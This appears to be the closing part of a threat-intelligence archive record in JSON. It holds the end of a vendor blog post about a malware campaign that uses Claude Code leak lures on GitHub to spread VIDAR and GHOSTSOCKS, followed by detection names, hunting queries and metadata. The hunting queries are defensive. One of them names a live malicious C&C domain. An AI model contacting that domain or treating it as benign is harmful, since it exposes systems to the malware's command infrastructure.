monitoring and other advanced detection technology can also detect and protect against the following known malicious components associated with in-the-wild exploits:\r\n- TrojanSpy.Win64.VIDAR.SMCLX (Smart Scan Agent Pattern 20.863)\r\n- Trojan.Win64.VIDAR.CLX (Smart Scan Agent Pattern 20.863)\r\nTrendAI Vision One™ Web Reputation Services (WRS)\r\nTrendAI Vision One™ is also blocking several known C\u0026C servers and Disease Vector IPs and domains known to be associated with these exploits. 
Aside from that, verified malicious GitHub repositories and leaked-code download links are blocked as Illegal or Prohibited Content.\r\nTrendAI Vision One™ Threat Intelligence Hub\r\nTrendAI Vision One™ Threat Intelligence Hub provides the latest insights on emerging threats and threat actors, exclusive strategic reports from TrendAI™ Research, and TrendAI Vision One™ Threat Intelligence Feed in the TrendAI Vision One™ platform.\r\nEmerging Threats: Claude Code Leak Social Engineering and Malware Distribution via GitHub\r\nTrendAI Vision One™ Intelligence Reports (IOC Sweeping)\r\nClaude Code Leak Social Engineering and Malware Distribution via GitHub\r\nHunting Queries\r\nTrendAI Vision One™ Search App\r\nTrendAI Vision One™ customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.\r\nDetects VIDAR and GHOSTSOCKS malware\r\nmalName: *VIDAR* OR *GHOSTSOCKS* and eventName: MALWARE_DETECTION\r\nDetects VIDAR connection to C\u0026C server\r\neventSubId:204 AND dst:(\"rti.cargomanbd.com\")\r\nMore hunting queries are available for TrendAI Vision One™ with Threat Intelligence Hub entitlement enabled.\r\nIndicators of Compromise (IOCs)\r\nIOCs related to this campaign can be found here.\r\nSource: https://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html"
	],
	"report_names": [
		"weaponizing-trust-claude-code-lures-and-github-release-payloads.html"
	],
	"threat_actors": [],
	"ts_created_at": 1778032937,
	"ts_updated_at": 1778033032,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7c2d866aac3a558ae228733c723c48da8260718c.pdf",
		"text": "https://archive.orkl.eu/7c2d866aac3a558ae228733c723c48da8260718c.txt",
		"img": "https://archive.orkl.eu/7c2d866aac3a558ae228733c723c48da8260718c.jpg"
	}
}